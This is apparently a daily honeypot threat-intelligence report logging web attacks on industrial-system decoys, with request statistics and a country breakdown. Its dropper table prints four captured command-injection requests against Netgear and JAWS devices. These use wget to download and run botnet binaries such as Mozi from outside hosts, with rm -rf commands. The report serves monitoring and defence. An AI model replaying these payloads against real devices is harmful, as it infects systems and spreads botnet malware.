Skip to main content
  1. Daily-Posts/

Report: 2025-07-27

·337 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-27
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 16 new requests that have never been observed before (these were added to the monitored request database.).

A total of 542 requests were recorded during the day, originating from 4 different countries, with a peak of 196 requests coming from DE.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
61.52.50.221GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://61.52.50.221:58216/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
185.180.39.132GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/89.221.203.116:6969/bins/arm7;chmod+777+arm7;./arm7+selfrep.jaws;wget+http:/\x5C/89.221.203.116:6969/bins/arm;chmod+777+arm;./arm+selfrep.jaws; HTTP/1.1
174.44.216.194GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd+/tmp;wget+http://unjiproxy.p-e.kr:6969/selftbk.sh+-O-
47.100.130.148GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
562CONNECT connectivitycheck.gstatic.com:443 HTTP/1.1
861GET /NmapUpperCheck1753582172 HTTP/1.1
971GET /ise/img/rm-logo_small.png HTTP/1.1
981GET /Nmap/folder/check1753582172 HTTP/1.1
1181GET /odinhttpcall1753644045 HTTP/1.1
1211GET /OdinHttpCall1753644045 HTTP/1.1
1251GET /Odin/http/call1753644045 HTTP/1.1
1371GET /nmaplowercheck1753582172 HTTP/1.1
1381GET /cgi-mod/header_logo.cgi?size=big HTTP/1.1
1391GET /IfgF HTTP/1.1
1911\x00\x0E8\xF4c2\xE9\xBC\x0EMe\x00\x00\x00\x00\x00
2041GET /main/main.html HTTP/1.1
2161GET /Odin/http/call1753622389 HTTP/1.1
2171GET /OdinHttpCall1753622389 HTTP/1.1
2181GET /odinhttpcall1753622389 HTTP/1.1
2631\x00\x0E8\xE7&\xF2+o\xFC-\x06\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0196DE
1100US
245JP
343GB
427NL
517BG
617PL
715IN
812SG
910HK
109CN
118RO
127CA
134HU
144SC
154UA
163KZ
173FR
183MU
192CH
202ES
212IR
222BE
232GR
241CZ
251KE
261PT
271KR
281PA

Related

Report: 2025-07-26
·272 words
Repport Daily
Report: 2025-07-25
·361 words
Repport Daily
Report: 2025-07-24
·340 words
Repport Daily